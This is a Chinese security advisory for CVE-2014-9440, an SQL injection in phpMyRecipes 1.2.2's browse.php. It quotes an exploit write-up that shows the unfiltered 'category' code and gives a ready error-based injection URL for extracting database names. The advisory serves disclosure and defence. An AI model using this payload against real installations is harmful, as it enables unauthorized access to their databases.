phpMyRecipes browse.php SQL注入漏洞

phpMyRecipes browse.php SQL注入漏洞

发布日期：2014-12-31
更新日期：2015-01-12

受影响系统：
phpMyRecipes phpMyRecipes 1.2.2
描述：
CVE(CAN) ID: CVE-2014-9440

 phpMyRecipes是存储及检索食谱的应用。

phpMyRecipes 1.2.2版本，browse.php在实现上存在sql注入漏洞，远程攻击者通过category参数，利用此漏洞可执行任意sql命令。

<*来源：Manish Tanwar
  *>

测试方法：

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！
Manish Tanwar （）提供了如下测试方法：

##################################################################################################
 #Exploit Title : phpMyRecipes 1.2.2 SQL injection(page browse.php, parameter category)
 #Author        : Manish Kishan Tanwar
 #Download Link : http://prdownloads.sourceforge.net/php-myrecipes/phpMyRecipes-1.2.2.tar.gz?download
 #Date          : 23/12/2014
 #Discovered at : IndiShell Lab
 # Love to      : zero cool,Team indishell,Mannu,Viki,Hardeep Singh,jagriti
 # email        : manish.1046@gmail.com
 ##################################################################################################

 ////////////////////////
 /// Overview:
 ////////////////////////

 phpMyRecipes is a simple application for storing and retrieving recipes.
 It uses a web-based interface, for ease of use across any system, and a MySQL database backend for storing the recipes.
 ///////////////////////////////
 // Vulnerability Description:
 ///////////////////////////////
 vulnerability is due to parameter category in browse.php
 parameter category is passing to function GetCategoryNameByID without data filtering and due to it, SQL injection vulnerability is arising.

 from line 38 to 56

    $category = $_GET['category'];
  }

  $session = getsession();

  c_header("Browse Recipes", "browse");

  # Build a category string
  $cat = $category;
  $catstr = "";
  while ($cat != 1) {
    if ($catstr == "") {
      $catstr = "<A HREF=\"" . slink("browse.php?category=$cat") . "\">" . GetCategoryNameByID($cat) .  "</A>" . $catstr;
    } else {
      $catstr = "<A HREF=\"" . slink("browse.php?category=$cat") . "\">" . GetCategoryNameByID($cat) .  "</A> > " . $catstr;
    }

    $cat = GetCategoryParentByID($cat);
  }
   

 ////////////////
 ///  POC  ////
 ///////////////

 POC image=http://oi57.tinypic.com/inv3ol.jpg
 payload for extracting database name
 set value of category parameter to 1 and add error based SQL injection payload to url
 
http://127.0.0.1/pr/browse.php?category=1 and(select 1 FROM(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(schema_name as char),0x27,0x7e) FROM information_schema.schemata LIMIT 0,1)) FROM information_schema.tables LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)

                              --==[[ Greetz To ]]==--
 ############################################################################################
 #Guru ji zero ,code breaker ica, root_devil, google_warrior,INX_r0ot,Darkwolf indishell,Baba,
 #Silent poison India,Magnum sniper,ethicalnoob Indishell,Reborn India,L0rd Crus4d3r,cool toad,
 #Hackuin,Alicks,mike waals,Suriya Prakash, cyber gladiator,Cyber Ace,Golden boy INDIA,
 #Ketan Singh,AR AR,saad abbasi,Minhal Mehdi ,Raj bhai ji ,Hacking queen,lovetherisk,Bikash Das
 #############################################################################################
                              --==[[Love to]]==--
 # My Father ,my Ex Teacher,cold fire hacker,Mannu, ViKi ,Ashu bhai ji,Soldier Of God, Bhuppi,
 #Mohit,Ffe,Ashish,Shardhanand,Budhaoo,Don(Deepika kaushik)
                        --==[[ Special Fuck goes to ]]==--
                            <3  suriya Cyber Tyson <3

建议：
厂商补丁：

phpMyRecipes
 ------------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://php-myrecipes.sourceforge.net/

本文永久更新链接地址：